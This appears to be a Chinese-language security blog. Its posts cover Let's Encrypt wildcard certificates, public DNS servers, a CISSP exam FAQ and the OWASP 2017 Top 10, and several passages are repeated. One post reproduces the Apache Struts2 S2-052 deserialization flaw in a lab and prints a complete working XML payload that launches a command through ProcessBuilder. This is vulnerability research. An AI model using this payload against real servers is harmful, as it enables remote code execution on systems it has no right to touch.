CISSP
2018年3月24日 星期六
Let's Encrypt通用憑證上線了
提供免費憑證服務的Let's Encrypt於本周正式發表了通用憑證(Wildcard certificates)服務,以及相容於通用憑證的ACMEv2協定。
通用憑證允許網站以單一憑證保障所有的子網域,例如當以 *.example.com申請通用憑證時,不管是www.example.com、payment.example.com或login.example.com都在該憑證的保障下;儘管Let's Encrypt建議絕大多數的網站都應採用非通用憑證,但為了推動100%的HTTPS加密傳輸,Let's Encrypt仍然替少數需求提供了通用憑證服務。
至於ACME協定的全名則是自動化憑證管理環境(Automatic Certificate Management Environment),它是一個憑證管理機構與網頁伺服器之間的自動化互動協定,能以極低的成本自動化公鑰架構的部署。
由於只有ACMEv2版本才能支援通用憑證,因此若要同時使用通用憑證與非通用憑證即必須升級到該版本。
根據Firefox的遙測數據,目前全球網友所造訪的網頁中,已有逾69%使用HTTPS加密傳輸,而在2015年9月Let's Encrypt剛上線時,該比例只有38%。
通用憑證允許網站以單一憑證保障所有的子網域,例如當以 *.example.com申請通用憑證時,不管是www.example.com、payment.example.com或login.example.com都在該憑證的保障下;儘管Let's Encrypt建議絕大多數的網站都應採用非通用憑證,但為了推動100%的HTTPS加密傳輸,Let's Encrypt仍然替少數需求提供了通用憑證服務。
至於ACME協定的全名則是自動化憑證管理環境(Automatic Certificate Management Environment),它是一個憑證管理機構與網頁伺服器之間的自動化互動協定,能以極低的成本自動化公鑰架構的部署。
由於只有ACMEv2版本才能支援通用憑證,因此若要同時使用通用憑證與非通用憑證即必須升級到該版本。
根據Firefox的遙測數據,目前全球網友所造訪的網頁中,已有逾69%使用HTTPS加密傳輸,而在2015年9月Let's Encrypt剛上線時,該比例只有38%。
2018年3月19日 星期一
DNS伺服器列表
Public
Cloudflare
1.1.1.1
Hinet
168.95.1.1
8.8.4.4
Secure
Quad 9(IBM免費DNS)
9.9.9.9
GSN(政府機關)
210.69.1.1210.69.2.1
ipv6
2001:4420::12001:4420::2:1
2018年2月10日 星期六
CISSP常見問題解答
Q:CISSP是什麼?
A:CISSP (Certified Information SystemsSecurity Professional) – “(ISC)²註冊資訊系統安全師”認證是資訊安全領域最被全球廣泛認可的IT安全認證,一直以來被譽為業界的“金牌標準”。CISSP 認證不僅是對個人資訊安全專業知識的客觀評估,也是全球公認的個人成就標準。
Q:為什麼要考CISSP?
A:CISSP持證人員是確保組織運營環境安全,定義組織安全架構、設計、管理和/或控制措施的資訊安全保障專業人士,CISSP持證者堪稱名副其實的、可信賴的安全顧問。CISSP 認證將確保資訊安全領導者擁有可靠地構建及管理組織的安全態勢所必備的廣泛知識、技能與經驗。CISSP 是資訊安全行業首個符合ISO/IEC 17024 國際標準嚴格要求的認證。如果您打算在資訊安全這一當今最為矚目的行業領域裡成就一番事業,獲得CISSP認證理應成為您下一個職業目標。
Q:考CISSP有什麼要求?
A:CISSP – 在CISSP CBK 規定的八大知識領域之中的兩個或以上範疇,擁有至少5年直接從事資訊安全領域的全職工作經驗。或具備學士學位且擁有4年的近期全職工作經驗。擁有(ISC)2 承認及核准的其它證書,可減免1年工作經驗要求。
Q:我工作經驗不夠怎麼辦?
A:在申請CISSP考試的時候同時選擇Associate選項即可加入準會員。準會員身份適合於在行業某些關鍵領域知識豐富但缺少實際工作經驗的情況。您可以參加CISSP 考試,同意遵守(ISC)² 道德規範,但要獲得CISSP證書,您仍需具備規定年限的從業經驗,提供證明並由(ISC)² 認證會員為您薦證。如果您正在努力考取此證書,您將從考試通過日起有最多六年時間去獲得所規定的五年從業經驗。另外每年需繳納35美元年費(AMF)並獲得15個持續專業教育(CPE) 學分,以保持資格有效性。
Q:什麼是薦證(背書),為什麼要完成薦證?
A:一旦您接到成功通過考試的通知,您將需要在證書正式授予前完成必要的鑑證手續。需填寫鑑證表(endorsement form),並需有另外一名(ISC)2 有效會員的簽名,證明您的專業工作經驗屬實。
Q:如何維持CISSP證書?
A:所有(ISC)2 證書持有者,每三年須進行再認證,滿足續證要求以維持證書有效性
Q:考試是英文還是中文?
A:可以預約簡體中文考試,考試中英文對照,如遇翻譯問題,以英文為準。
Q:在哪裡能參加CISSP考試?
A:台北、高雄
Q:考試題目是什麼樣的?
A:250道選擇題。
Q:考試通過分數是多少?
A:總分1000,700分通過。
Q:考CISSP應該看什麼樣的材料?
A:cissp官方學習指南第七版,cissp官方題集。多做練習題。
Q:考CISSP一般要復習多長時間?
A:因人而異,平均3個月左右。
Q:CISSP中文考試是發中文證書嗎?
A:不是。一樣是英文證書,與英文考試所發證書一樣,沒有任何區別。
Q:考試應該攜帶什麼證件?
A:身份證+本人簽名信用卡。推薦身份證+護照。
Q:考場有什麼要求?
A:同其他相關考試類似,但更加嚴格。考前會有工作人員進行解釋和說明。
Q:考試的時候能吃飯喝水上廁所嗎?
A:可以根據自身情況隨意安排,但是所有休息時間均計算入考試總時長。
Q:考完多久可以出成績?
A:一般是現場出具成績報告
Q:考試費用是多少?
A:599美元
Q:CISSP認證可以用於移民加分嗎?
A:可以適用於技術移民。
Q:CISSP含金量有多高?薪資水平怎麼樣?就業形式怎麼樣?
A:CISSP是是全球普遍認可的資訊安全從業人員最高水平專業資質。
美國CISSP平均年薪8.3萬美元,中國目前CISSP獲得者原本便處於IT行業中薪酬較高的職位,獲得資質之後得到升職、加薪或通過跳槽達到更高薪酬水平。
CISSP目前在全球範圍內都屬緊缺人才,持有CISSP認證移民時可獲10加分。
Q:拿到CISSP資質之後,薪水能有多高?
A:從統計學的角度,CISSP是獲得高薪的證明。獲得CISSP資質,讓名企高薪主動來鎖定你,提高了用人單位對你薪資水準的期望,具體來說,同樣經驗的兩個人,獲得了CISSP和沒有獲得CISSP兩者之間相比,在獵頭眼里和尋找人才的單位眼裡具有完全不一樣的個人價值,開出的薪水也完全不一樣。當然具體到個人還要看個人能力。
Q:CISSP是技術類培訓還是管理類培訓?
A:CISSP內容既涵蓋技術,比如通信與網絡、訪問控制等領域;也涵蓋管理,比如安全管理實務等,但是不涵蓋任何技術細節或具體廠商產品。資訊安全三分技術七分管理,技術與管理之分已日趨模糊,二者密不可分。
Q:我又不做網絡安全,有必要考CISSP嗎?
A:首先,CISSP是資訊安全培訓,而不是網絡安全培訓。資訊安全包括技術和管理等許多領域,不僅僅針對網絡。
其次,資訊安全已超越IT範疇,是保障組織業務持續有效運行、同其它業務部門一樣產生效益的重要領域,網絡安全工作者需要關注,整個IT部門乃至業務部門也都有義務參與資訊安全學習。
Q:據說,CISSP很多概念,內容很淺,我工作很多年了/我已經是高層職位了/我自認為技術經驗非常豐富/我從來都不相信認證,我考CISSP有什麼用?
A:CISSP是“專家”課程,包括資訊安全共八個領域的知識,其宗旨是建立起全面的知識體系,培養有相關工作經驗、知識和才能的人才,並不在於培養某個方面的技術專家。具備CISSP知識是成為資訊安全專家的必要非充分條件。
我已經工作很多年了――這是一個知識飛速更新的時代,IT行業尤其如此,工作多年的人固然有經驗沉澱,但實時充實自己的頭腦未償不是件壞事。更何況,競爭激烈,當更多年輕人持有CISSP證書時,您也該考慮給自己的職業前途增添幾個有分量的籌碼了。
我已經是高層職位了――為了通向更高層的職位,考一個CISSP認證吧!
我自認為技術經驗非常豐富――通常大家在自己所專注的領域都具備相當的知識和經驗,但CISSP包含很多個領域,全面學習其它知識有助於提高自身綜合素質,技術型向管理型轉變,管理型亦有機會了解技術知識。
我從來都不相信認證――但是別人相信,你的上司,人事部,獵頭公司,他們都相信認證資質是一個人能力的強有力的證明。
A:CISSP (Certified Information SystemsSecurity Professional) – “(ISC)²註冊資訊系統安全師”認證是資訊安全領域最被全球廣泛認可的IT安全認證,一直以來被譽為業界的“金牌標準”。CISSP 認證不僅是對個人資訊安全專業知識的客觀評估,也是全球公認的個人成就標準。
Q:為什麼要考CISSP?
A:CISSP持證人員是確保組織運營環境安全,定義組織安全架構、設計、管理和/或控制措施的資訊安全保障專業人士,CISSP持證者堪稱名副其實的、可信賴的安全顧問。CISSP 認證將確保資訊安全領導者擁有可靠地構建及管理組織的安全態勢所必備的廣泛知識、技能與經驗。CISSP 是資訊安全行業首個符合ISO/IEC 17024 國際標準嚴格要求的認證。如果您打算在資訊安全這一當今最為矚目的行業領域裡成就一番事業,獲得CISSP認證理應成為您下一個職業目標。
Q:考CISSP有什麼要求?
A:CISSP – 在CISSP CBK 規定的八大知識領域之中的兩個或以上範疇,擁有至少5年直接從事資訊安全領域的全職工作經驗。或具備學士學位且擁有4年的近期全職工作經驗。擁有(ISC)2 承認及核准的其它證書,可減免1年工作經驗要求。
Q:我工作經驗不夠怎麼辦?
A:在申請CISSP考試的時候同時選擇Associate選項即可加入準會員。準會員身份適合於在行業某些關鍵領域知識豐富但缺少實際工作經驗的情況。您可以參加CISSP 考試,同意遵守(ISC)² 道德規範,但要獲得CISSP證書,您仍需具備規定年限的從業經驗,提供證明並由(ISC)² 認證會員為您薦證。如果您正在努力考取此證書,您將從考試通過日起有最多六年時間去獲得所規定的五年從業經驗。另外每年需繳納35美元年費(AMF)並獲得15個持續專業教育(CPE) 學分,以保持資格有效性。
Q:什麼是薦證(背書),為什麼要完成薦證?
A:一旦您接到成功通過考試的通知,您將需要在證書正式授予前完成必要的鑑證手續。需填寫鑑證表(endorsement form),並需有另外一名(ISC)2 有效會員的簽名,證明您的專業工作經驗屬實。
Q:如何維持CISSP證書?
A:所有(ISC)2 證書持有者,每三年須進行再認證,滿足續證要求以維持證書有效性
Q:考試是英文還是中文?
A:可以預約簡體中文考試,考試中英文對照,如遇翻譯問題,以英文為準。
Q:在哪裡能參加CISSP考試?
A:台北、高雄
Q:考試題目是什麼樣的?
A:250道選擇題。
Q:考試通過分數是多少?
A:總分1000,700分通過。
Q:考CISSP應該看什麼樣的材料?
A:cissp官方學習指南第七版,cissp官方題集。多做練習題。
Q:考CISSP一般要復習多長時間?
A:因人而異,平均3個月左右。
Q:CISSP中文考試是發中文證書嗎?
A:不是。一樣是英文證書,與英文考試所發證書一樣,沒有任何區別。
Q:考試應該攜帶什麼證件?
A:身份證+本人簽名信用卡。推薦身份證+護照。
Q:考場有什麼要求?
A:同其他相關考試類似,但更加嚴格。考前會有工作人員進行解釋和說明。
Q:考試的時候能吃飯喝水上廁所嗎?
A:可以根據自身情況隨意安排,但是所有休息時間均計算入考試總時長。
Q:考完多久可以出成績?
A:一般是現場出具成績報告
Q:考試費用是多少?
A:599美元
Q:CISSP認證可以用於移民加分嗎?
A:可以適用於技術移民。
Q:CISSP含金量有多高?薪資水平怎麼樣?就業形式怎麼樣?
A:CISSP是是全球普遍認可的資訊安全從業人員最高水平專業資質。
美國CISSP平均年薪8.3萬美元,中國目前CISSP獲得者原本便處於IT行業中薪酬較高的職位,獲得資質之後得到升職、加薪或通過跳槽達到更高薪酬水平。
CISSP目前在全球範圍內都屬緊缺人才,持有CISSP認證移民時可獲10加分。
Q:拿到CISSP資質之後,薪水能有多高?
A:從統計學的角度,CISSP是獲得高薪的證明。獲得CISSP資質,讓名企高薪主動來鎖定你,提高了用人單位對你薪資水準的期望,具體來說,同樣經驗的兩個人,獲得了CISSP和沒有獲得CISSP兩者之間相比,在獵頭眼里和尋找人才的單位眼裡具有完全不一樣的個人價值,開出的薪水也完全不一樣。當然具體到個人還要看個人能力。
Q:CISSP是技術類培訓還是管理類培訓?
A:CISSP內容既涵蓋技術,比如通信與網絡、訪問控制等領域;也涵蓋管理,比如安全管理實務等,但是不涵蓋任何技術細節或具體廠商產品。資訊安全三分技術七分管理,技術與管理之分已日趨模糊,二者密不可分。
Q:我又不做網絡安全,有必要考CISSP嗎?
A:首先,CISSP是資訊安全培訓,而不是網絡安全培訓。資訊安全包括技術和管理等許多領域,不僅僅針對網絡。
其次,資訊安全已超越IT範疇,是保障組織業務持續有效運行、同其它業務部門一樣產生效益的重要領域,網絡安全工作者需要關注,整個IT部門乃至業務部門也都有義務參與資訊安全學習。
Q:據說,CISSP很多概念,內容很淺,我工作很多年了/我已經是高層職位了/我自認為技術經驗非常豐富/我從來都不相信認證,我考CISSP有什麼用?
A:CISSP是“專家”課程,包括資訊安全共八個領域的知識,其宗旨是建立起全面的知識體系,培養有相關工作經驗、知識和才能的人才,並不在於培養某個方面的技術專家。具備CISSP知識是成為資訊安全專家的必要非充分條件。
我已經工作很多年了――這是一個知識飛速更新的時代,IT行業尤其如此,工作多年的人固然有經驗沉澱,但實時充實自己的頭腦未償不是件壞事。更何況,競爭激烈,當更多年輕人持有CISSP證書時,您也該考慮給自己的職業前途增添幾個有分量的籌碼了。
我已經是高層職位了――為了通向更高層的職位,考一個CISSP認證吧!
我自認為技術經驗非常豐富――通常大家在自己所專注的領域都具備相當的知識和經驗,但CISSP包含很多個領域,全面學習其它知識有助於提高自身綜合素質,技術型向管理型轉變,管理型亦有機會了解技術知識。
我從來都不相信認證――但是別人相信,你的上司,人事部,獵頭公司,他們都相信認證資質是一個人能力的強有力的證明。
2018年1月27日 星期六
Struts2-052 RCE CVE-2017-9805漏洞
漏洞描述:
2017年9月5日,Apache Struts發佈最新安全公告,Apache Struts2的REST插件存在遠程代碼執行的高危漏洞,該漏洞由lgtm.com的安全研究員匯報,漏洞編號為CVE-2017-9805(S2-052)。Struts2 REST插件的XStream組件存在反序列化漏洞,使用XStream組件對XML格式的數據包進行反序列化操作時,未對數據內容進行有效驗證,存在安全隱患,可被遠程攻擊。問題出現在struts2-rest-plugin插件XStreamHandler處理器中的toObject()方法,其中未對傳入的值進行任何限制,在使用XStream反序列化轉換成對象時,導致任意代碼執行漏洞。
官網描述:https://cwiki.apache.org/confluence/display/WW/S2-052
漏洞編號:CVE-2017-9805(S2-052)
漏洞評級:高危
復現環境搭建:
從struts2的官網下載最後受影響的版本struts-2.5.12
下載地址:http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip
在Tomcat下部署struts2-rest-showcase.war
訪問http://xxx:8088/struts2-rest-showcase/orders.xhtml 點擊View按鈕
截獲數據包:
寫入http頭:Content-Type: application/xml
寫入poc
成功執行命令:
Poc生成工具:
下載地址:https://github.com/mbechler/marshalsec
漏洞檢測POC:
Windows 下測試:</string>calc</string>
MAC下測試:</string>/Applications/Calculator.app/Contents/MacOS/Calculator</string><map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> </entry> </map>
復現分析doc附件下載:
Struts2-052 RCE CVE-2017-9805漏洞復現分析.docx
復現成功GIF:
必看:
指尖安全提供了S2-052漏洞在線檢測工具:http://scan.secfree.com/index.jsp
只是拿s2-045做了檢測截圖 s2-052不敢搭公網。
2018年1月5日 星期五
OWASP 2017
OWASP每四年會更新一版
上一次是OWASP 2013
A1:2017-Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
A2:2017-Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.
A3:2017-Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
A4:2017-XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
A5:2017-Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.
A6:2017-Security Misconfiguration
Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
A7:2017-Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A8:2017-Insecure Deserialization
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
A9:2017-Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
A10:2017-Insufficient Logging&Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
上一次是OWASP 2013
A1:2017-Injection
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
A2:2017-Broken Authentication
Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities temporarily or permanently.
A3:2017-Sensitive Data Exposure
Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
A4:2017-XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
A5:2017-Broken Access Control
Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.
A6:2017-Security Misconfiguration
Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
A7:2017-Cross-Site Scripting (XSS)
XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A8:2017-Insecure Deserialization
Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
A9:2017-Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
A10:2017-Insufficient Logging&Monitoring
Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
資安網站
行政院國家資通安全會報技術服務中心https://www.nccst.nat.gov.tw/
國家電腦事件處理中心
Taiwan National Computer Emergency Response Teamhttps://www.twncert.org.tw/
TWCERT/CC 台灣電腦網路危機處理暨協調中心
https://www.twcert.org.tw/ 財團法人電信技術中心
http://www.ttc.org.tw/
訂閱:
文章 (Atom)